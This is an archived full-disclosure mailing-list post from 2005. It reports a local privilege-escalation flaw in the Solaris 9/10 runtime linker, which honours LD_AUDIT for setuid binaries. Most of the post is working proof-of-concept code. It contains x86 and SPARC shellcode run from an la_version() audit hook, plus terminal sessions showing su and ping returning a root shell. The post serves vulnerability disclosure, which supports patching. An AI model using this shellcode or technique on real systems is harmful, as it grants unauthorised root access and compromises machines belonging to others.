Solaris 9/10 ld.so fun

• Previous message: Martin Pitt: "[USN-145-1] wget vulnerabilities"
• Next in thread: Przemyslaw Frasunek: "Re: [Full-disclosure] Solaris 9/10 ld.so fun"
• Reply: Przemyslaw Frasunek: "Re: [Full-disclosure] Solaris 9/10 ld.so fun"
• Reply: Przemyslaw Frasunek: "Re: [Full-disclosure] Solaris 9/10 ld.so fun"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Tue, 28 Jun 2005 01:11:58 +0200
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com

ld.so from Solaris 9 and 10 doesn't check LD_AUDIT environment variable when
running s[ug]id binaries, allowing to run arbitrary code with elevated
privileges. Well, I can't belive, that such trivial vulnerability exists in
modern OS...

The following PoC code was tested on:

- SunOS 5.10 Generic i86pc i386 i86pc
- SunOS 5.9 Generic_112233-12 sun4u

It does NOT work on:

SunOS 5.8 Generic_117350-02 sun4u sparc

Example on unpatched Solaris 10 (AMD64):

atari:venglin:~> cat dupa.c
static char sh[] =
"\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xff";

int la_version() {
        void (*f)();
        f = (void*)sh;
        f();
        return 3;
}
atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c
atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so
atari:venglin:~> su
# id
uid=0(root) gid=10(staff)

Solaris 9 on SPARC:

$ cat dupa.c
char sh[] =
/* setuid() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve() */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

int la_version() {
        void (*f)();
        f = (void*)sh;
        f();
        return 3;
}

$ gcc -fPIC -shared -o /tmp/dupa.so dupa.c
$ export LD_AUDIT=/tmp/dupa.so
$ ping
# id
uid=0(root) gid=100(student)

-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
* JID: venglin@jabber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *

• Previous message: Martin Pitt: "[USN-145-1] wget vulnerabilities"
• Next in thread: Przemyslaw Frasunek: "Re: [Full-disclosure] Solaris 9/10 ld.so fun"
• Reply: Przemyslaw Frasunek: "Re: [Full-disclosure] Solaris 9/10 ld.so fun"
• Reply: Przemyslaw Frasunek: "Re: [Full-disclosure] Solaris 9/10 ld.so fun"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages [Full-disclosure] Solaris 9/10 ld.so fun ... allowing to run arbitrary code with elevated ... Example on unpatched Solaris 10: ... int la_version{ ... (Full-Disclosure) Re: XtVaCreateManagedWidget crash ... Solaris 10 and also moving it to 32-bit to a 64-bit architecture. ... uiwidget = XtVaAppCreateShell( ... int value; ... This usually happens to work on 32-bit platforms, ... (comp.windows.x.motif) Re: CC compiler error with solaris 5.8 ... but this is what the standard requires.) ... the only version of "abs" available was the ... traditional "int" version. ... Recent updates of Solaris headers and libraries now comply with the C++ standard ... (comp.unix.solaris) Re: Mathematica problems on Solaris ... It's not entirely fair to blame the vendors for not ... understanding Solaris as well as a Solaris engineer. ... and not poll and return immediately. ... (comp.unix.solaris) Problem in /dev/audioctl ... It runs when i comment these lines but i hear no audio output at ... of Solaris 2.6, ... due to introduction of virtual channels in S8. ... int audioCtlDevice; ... (comp.unix.solaris)